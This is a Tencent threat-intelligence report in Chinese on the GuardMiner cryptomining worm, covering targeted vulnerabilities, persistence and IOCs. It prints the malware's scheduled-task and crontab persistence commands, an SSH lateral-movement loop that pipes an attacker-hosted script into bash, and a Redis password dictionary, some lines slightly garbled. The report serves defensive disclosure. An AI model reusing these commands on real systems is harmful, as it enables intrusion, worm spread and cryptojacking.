GuardMiner挖矿木马近期活跃,具备蠕虫化主动攻击能力,已有较多企业中招 – 作者:腾讯电脑管家

一、背景

腾讯安全威胁情报中心检测到跨平台挖矿木马GuardMiner近期十分活跃,该木马会扫描攻击Redis、Drupal、Hadoop、Spring、thinkphp、WebLogic、SQLServer、Elasticsearch多个服务器组件漏洞,并在攻陷的Windows和Linux系统中分别执行恶意脚本init.ps1,init.sh,恶意脚本会进一步下载门罗币挖矿木马、清除竞品挖矿木马并进行本地持久化运行。在Linux系统上利用SSH连接和Redis弱口令爆破进行内网扩散攻击。因挖矿守护进程使用文件名为sysguard、sysguerd、phpguard,腾讯安全威胁情报中心将该挖矿木马命名为GuardMiner。 

因该病毒已具备蠕虫化主动攻击扩散的能力,已有部分企业中招。腾讯安全专家建议政企机构尽快修复服务器组件漏洞,相关服务避免使用弱口令。腾讯安全系列产品均可检测并协助清除GuardMiner挖矿木马。

腾讯安全系列产品应对GuardMiner挖矿木马的响应清单:

应用场景 安全产品 解决方案
腾讯T-Sec 威胁情报云查服务 (SaaS) 1)GuardMiner挖矿木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics
腾讯T-Sec 高级威胁追溯系统 1)GuardMiner挖矿木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts
云原生安全防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用WebLogic远程代码执行漏洞CVE-2017-10271相关联的IOCs已支持识别检测。   有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw
腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持WebLogic远程代码执行漏洞CVE-2017-10271、thinkphp5高危漏洞的检测; 2)已支持查杀利用WebLogic远程代码执行漏洞CVE-2017-10271、thinkphp5高危漏洞、Redis未授权访问漏洞入侵的挖矿木马、后门程序。   腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp
腾讯T-Sec 网络资产风险监测系统 (腾讯御知) 1)腾讯御知已支持监测全网资产是否受WebLogic远程代码执行漏洞CVE-2017-10271、thinkphp5高危漏洞影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。   关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html
腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。   关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html
非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用WebLogic远程代码执行漏洞CVE-2017-10271、thinkphp5高危漏洞相关联的IOCs已支持识别检测; 2)对利用WebLogic远程代码执行漏洞CVE-2017-10271、thinkphp5高危漏洞协议特征进行识别检测。   关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta
腾讯T-Sec终端安全管理系统(御点) 1)可查杀GuardMiner挖矿木马团伙入侵释放的后门木马、挖矿木马程序;   腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html

更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/

二、样本分析

1、init.ps1攻击Windows系统,从服务器下载挖矿进程phpupdate.exe,配置文件config.json,扫描攻击进程networkmanager.exe,持久化脚本newdat.ps1,挖矿守护进程phpguard.exe,清理脚本clean.bat。

1.png

2、init.sh攻击Linux系统,从服务器下载挖矿进程phpupdate,配置文件config.json,持久化脚本newdat.sh,扫描攻击进程networkmanager,挖矿守护进程phpuguard。

2.png

3、门罗币挖矿进程phpupdate.exe占用CPU接近100%:

3.png

挖矿使用的三组矿池和钱包分别如下:

xmr.f2pool.com:13531

43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520

 

xmr-eu2.nanopool.org:14444

43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520

 

randomxmonero.hk.nicehash.com:3380

3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.v520

 

4.png

4、清除竞品挖矿木马文件:

5.png

5、phpguard.exe、phpguard负责守护挖矿进程,进程退出后立即重启:

6.png

6、在Windows系统上通过安装计划任务持久化,每隔30分钟执行一次newdat.ps1:

SchTasks.exe /Create /SC MINUTE /TN “Update service for Windows Service” /TR “PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\newdat.ps1” /MO 30 /F

 

在Linux系统上通过定时任务持久化,每隔30分钟执行一次newdat.sh:

crontab -l ; echo “*/30 * * * * sh/etc/newdat.sh >/dev/null 2>&1”

 

7、在Linux系统上还会通过sshown_hosts获取登录过的机器IP,建立SSH连接并执行远程shell脚本is.sh,进行内网扩散攻击:

if [ -f /root/.sshown_hosts ] && [-f /root/.ssh/id_rsa.pub ]; then

  forh in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b”/root/.sshown_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5-oStrictHostKeyChecking=no $h ‘curl -o- http[:]//global.bitmex.com.de/cf67355a3333e6/is.sh | bash >/dev/null2>&1 &’ & done

fi

 

is.sh接着安装扫描工具Pnscan和Masscan针对全网段IP范围进行6379端口(Redis服务)扫描,并通过Redis弱口令爆破(密码字典:redis、root、oracle、password、p@aaw0rd、abc123、abc123!、123456、admin)以及未授权访问漏洞感染执行init.sh:

7.png

8.png

8、Windows系统上执行networkmanager.exe,Linux系统上执行networkmanager,开启漏洞扫描和利用攻击,针对以下服务器组件,攻击成功后在Windows系统执行Powershell脚本,在Linux系统执行shell脚本进行进行感染:

1)     Redis未授权访问漏洞;

2)     Drupal框架CVE-2018-7600漏洞;

3)     Hadoop未授权漏洞;

4)     Spring框架CVE-2018-1273漏洞;

5)     thinkphp框架TP5高危漏洞;

6)     WebLogic框架CVE-2017-10271漏洞;

7)     SQLServer框架xcmd_shell、SP_OACreate注入提权漏洞;

8)     Elasticsearch框架CVE-2015-1427、CVE-2014-3120远程代码执行漏洞。

9.png

IOCs

IP

185.247.117.64

209.182.218.161

178.157.91.26

146.71.79.230

43.245.222.57

 

URL

http[:]//185.247.117.64/cf67355/phpupdate

http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate

http[:]//185.247.117.64/cf67355/newdat.sh

http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.sh

http[:]//185.247.117.64/cf67355/config.json

http[:]//global.bitmex.com.de/cf67355a3333e6/config.json

http[:]//185.247.117.64/cf67355/networkmanager

http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager

http[:]//185.247.117.64/cf67355/phpguard

http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard

http[:]//185.247.117.64/cf67355/phpupdate.exe

http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate.exe

http[:]//185.247.117.64/cf67355/config.json

http[:]//global.bitmex.com.de/cf67355a3333e6/config.json

http[:]//185.247.117.64/cf67355/networkmanager.exe

http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager.exe

http[:]//185.247.117.64/cf67355/newdat.ps1

http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.ps1

http[:]//185.247.117.64/cf67355/phpguard.exe

http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard.exe

http[:]//185.247.117.64/cf67355/clean.bat

http[:]//global.bitmex.com.de/cf67355a3333e6/clean.bat

 

md5

init.ps1 8c179d90a30b9ff905c810f7e3eb28a1
init.sh 6bb17fedbc6737189d4ea61a54db65ea
rs.sh 190234640306730c02a738b8a46b62ea
is.sh 9b0d0e89b1ae2728ebf9ca0418230a04
phpupdate.exe 97f3dab8aa665aac5200485fc23b9248
networkmanager.exe 85b670f8b603b4e98b4f98b768fe4f51
phpguard.exe 6004de04a0430b6cf4fd49c0ea306d8d
networkmanager 8d1fff480d2c8dd9438b9d09d31838b0
phpupdate 149c79bf71a54ec41f6793819682f790
phpguard 2f975f548551024030c615d451cd10a0

 

参考链接:

https://www.freebuf.com/column/205114.html

https://www.freebuf.com/articles/system/233138.html

https://s.tencent.com/research/report/904.html

来源:freebuf.com 2020-06-23 17:17:35 by: 腾讯电脑管家

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论